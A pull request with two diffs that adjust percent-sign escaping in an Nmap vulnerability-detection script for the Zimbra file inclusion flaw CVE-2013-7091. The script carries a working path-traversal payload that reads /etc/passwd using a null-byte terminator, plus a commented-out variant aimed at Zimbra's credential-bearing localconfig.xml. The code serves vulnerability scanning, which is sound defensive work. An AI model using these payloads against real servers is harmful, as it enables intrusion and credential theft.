### PR TITLE
remove bug from http-vuln-cve2013-7091

### DIFF
--- a/scripts/http-vuln-cve2013-7091.nse
+++ b/scripts/http-vuln-cve2013-7091.nse
@@ -56,7 +56,7 @@ categories = {"exploit","vuln","intrusive"}
 portrule = shortport.http
 
 -- function to escape specific characters
-local escape = function(str) return string.gsub(str, "", "") end
+local escape = function(str) str = string.gsub(str, "%%", "%%%%") return string.gsub(str, "", "") end
 
 action = function(host, port)
   local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/zimbra"
@@ -88,8 +88,8 @@ This issue was patched in Zimbra 7.2.6.
   local file_long = "../../../../../../../../../etc/passwd"
   --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
 
-  local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%%00"
-  local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%%00"
+  local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
+  local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
   stdnse.debug1("Trying to detect if the server is vulnerable")
   stdnse.debug1("GET " .. uri .. escape(url_short))
   stdnse.debug1("GET " .. uri .. escape(url_long))

--- a/scripts/http-vuln-cve2013-7091.nse
+++ b/scripts/http-vuln-cve2013-7091.nse
@@ -88,9 +88,8 @@ This issue was patched in Zimbra 7.2.6.
   local file_long = "../../../../../../../../../etc/passwd"
   --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
 
-  local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
-  local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
-
+  local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%%00"
+  local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%%00"
   stdnse.debug1("Trying to detect if the server is vulnerable")
   stdnse.debug1("GET " .. uri .. escape(url_short))
   stdnse.debug1("GET " .. uri .. escape(url_long))


### PR DESCRIPTION
Just giving one % will make it an improper format string and that's why I added another % in order to make it a proper format string.